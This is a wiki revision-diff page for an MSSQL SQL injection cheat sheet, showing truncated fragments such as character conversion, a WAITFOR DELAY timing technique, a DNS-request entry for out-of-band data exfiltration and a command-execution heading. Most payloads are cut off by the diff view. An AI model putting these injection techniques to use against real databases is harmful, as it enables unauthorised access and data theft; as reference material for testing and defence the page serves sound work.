hacking:sql_injection_cheat_sheet_mssql
Differences
This shows you the differences between two versions of the page.
Both sides previous revisionPrevious revisionNext revision | Previous revision | ||
hacking:sql_injection_cheat_sheet_mssql [2020/04/01 09:41] – peter | hacking:sql_injection_cheat_sheet_mssql [2020/07/15 09:30] (current) – external edit 127.0.0.1 | ||
---|---|---|---|
Line 51: | Line 51: | ||
</ | </ | ||
|ASCII Value -> Char|SELECT char(0x41) -- returns A| | |ASCII Value -> Char|SELECT char(0x41) -- returns A| | ||
- | |Char -> ASCII Value|SELECT ascii(' | + | |Char -> ASCII Value|SELECT ascii(' |
|Casting|< | |Casting|< | ||
SELECT CAST(' | SELECT CAST(' | ||
Line 62: | Line 62: | ||
|Time Delay|WAITFOR DELAY ' | |Time Delay|WAITFOR DELAY ' | ||
|Make DNS Requests|< | |Make DNS Requests|< | ||
- | < | + | declare @host varchar(800); |
declare @host varchar(800); | declare @host varchar(800); | ||
- | </ | + | |
-- NB: Concatenation is not allowed in calls to these SPs, hence why we have to use @host. Messy but necessary. | -- NB: Concatenation is not allowed in calls to these SPs, hence why we have to use @host. Messy but necessary. | ||
- | -- Also check out theDNS tunnel feature of [[http:// | + | -- Also check out theDNS tunnel feature of [[http:// |
</ | </ | ||
|Command Execution|< | |Command Execution|< | ||
Line 95: | Line 95: | ||
tempdb | tempdb | ||
</ | </ | ||
+ | |||
+ | ---- | ||
+ | |||
+ | ===== References ===== | ||
+ | |||
+ | https:// | ||
hacking/sql_injection_cheat_sheet_mssql.1585734116.txt.gz · Last modified: 2020/07/15 09:30 (external edit)